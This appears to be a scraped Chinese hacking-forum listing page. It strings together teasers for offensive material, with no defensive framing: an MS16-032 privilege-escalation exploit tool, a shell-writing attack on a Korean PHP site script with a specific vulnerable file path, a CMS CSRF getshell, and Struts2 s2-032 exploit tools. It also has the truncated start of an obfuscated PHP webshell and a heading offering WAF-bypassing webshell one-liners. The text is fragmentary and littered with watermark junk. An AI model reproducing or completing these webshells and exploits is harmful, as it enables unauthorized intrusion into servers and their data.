MS16-032 EPATHOBJ 0day exploit 提权工具和代码

MS16-032

韩国kimson程序写shell

客户让测试的一个站的时候碰到这个程序,在韩国带颜色的交友站大部分用的是这个。
这程序注入有多几个,但是后台是独立可改目录名的,所以数据多的时候感觉注入也没啥用

C:\WWW\kimson\_system\module\chat\msgAct.php

蝉知CMS5.3 CRSF getshell

1122145631ccefd82ceae87f0b819ab0ca19094a[1]

服务器上捡的php一句话

<?php 
error_reporting(0); 
set_time_limit(0);
function My_base($data,$key){
        $key=md5($key);
       &

WIN2003本地提权检测工具及源码

WIN2003本地提权检测工具

iisspy.exe读取IIS信息

该代码从aspxspy 2014 里面抠出来的
场景: - 低调求发展* N: P3 |' X, u' U# X! ~
服务器不支持aspx
用vbs 无权限 查询wimc - 专注网络安全* @# L* z" |  t" j( W0 M

2016最新过狗一句话 asp、php、aspx

asp:


--------------------------------------------------------------

<%
dim play
'
'
'''''''''''''&#

Struts2批量漏洞检测工具

批量检测是否存在s2-016,s2-019,s2-032漏洞

Struts2漏洞利用

sturt2-032漏洞利用工具及源码

Struts032漏洞利用工具.jpg

Struts2 s2-032远程代码执行分析

Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。